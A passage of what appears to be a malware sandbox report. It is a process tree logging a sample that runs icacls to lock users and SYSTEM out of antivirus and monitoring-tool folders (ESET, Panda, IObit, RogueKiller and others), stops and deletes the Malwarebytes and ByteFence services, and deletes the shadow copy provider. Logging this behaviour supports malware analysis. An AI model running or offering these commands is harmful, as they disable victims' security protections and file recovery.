                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:4152
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                    icacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                    PID:2996
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                    PID:2296
                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                        PID:2024
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                        icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                                                        PID:2432
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                        PID:344
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                          icacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                          PID:1344
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                          PID:3164
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                              PID:1340
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                              icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                              PID:1172
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                              PID:3624
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                icacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:1996
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:328
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                      PID:1552
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                      icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                        PID:2264
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:4364
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                          icacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                          PID:1376
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                          PID:1732
                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                              PID:2860
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                              icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                PID:2272
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                PID:1944
                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                    PID:4604
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                    icacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                    PID:4336
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                    PID:4400
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                        PID:2344
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                        icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:4676
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                          PID:4956
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                              PID:1684
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                              icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                PID:1124
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                PID:4884
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                    PID:3160
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                    icacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                    PID:1716
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                    PID:2268
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1932
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                        icacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4348
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4664
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                            icacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                            PID:2992
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                            PID:2136
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                PID:576
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                icacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:4576
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:2356
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:4008
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                      icacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                      PID:1308
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:3504
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                        icacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                        PID:1128
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:4572
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:2432
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                            PID:1028
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:336
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                              icacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                              PID:1432
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:4116
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                icacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:4728
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GPU Temp" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:3420
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:2112
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                      icacls "C:\Program Files (x86)\GPU Temp" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                      PID:2520
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\CPUID\HWMonitor" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:2852
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                        icacls "C:\Program Files\CPUID\HWMonitor" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                        PID:2708
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:4764
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                          icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                          PID:236
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\QuickCPU" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:3944
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:764
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                              icacls "C:\Program Files\QuickCPU" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                              PID:4336
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "c:\program files\NETGATE" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:1724
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                icacls "c:\program files\NETGATE" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:3576
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Wise" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:4400
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                    icacls "C:\Program Files (x86)\Wise" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:3068
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ReasonLabs" /deny "%username%":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:3384
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                        icacls "C:\Program Files\ReasonLabs" /deny "Admin":(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1240
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny %username%:(OI)(CI)F
                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:2956
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:2152
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                            icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny Admin:(OI)(CI)F
                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:1592
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)F
                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:2148
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2260
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)F
                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4720
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny %username%:(OI)(CI)F
                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1324
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny Admin:(OI)(CI)F
                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2184
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c sc delete swprv
                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:892
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          sc delete swprv
                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1212
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sc stop mbamservice
                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4512
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            sc stop mbamservice
                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1924
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4244
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1128
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                sc stop bytefenceservice
                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2320
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3032
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  sc delete bytefenceservice
                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2296
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c sc delete mbamservice
                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1132
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    sc delete mbamservice
                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:344
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
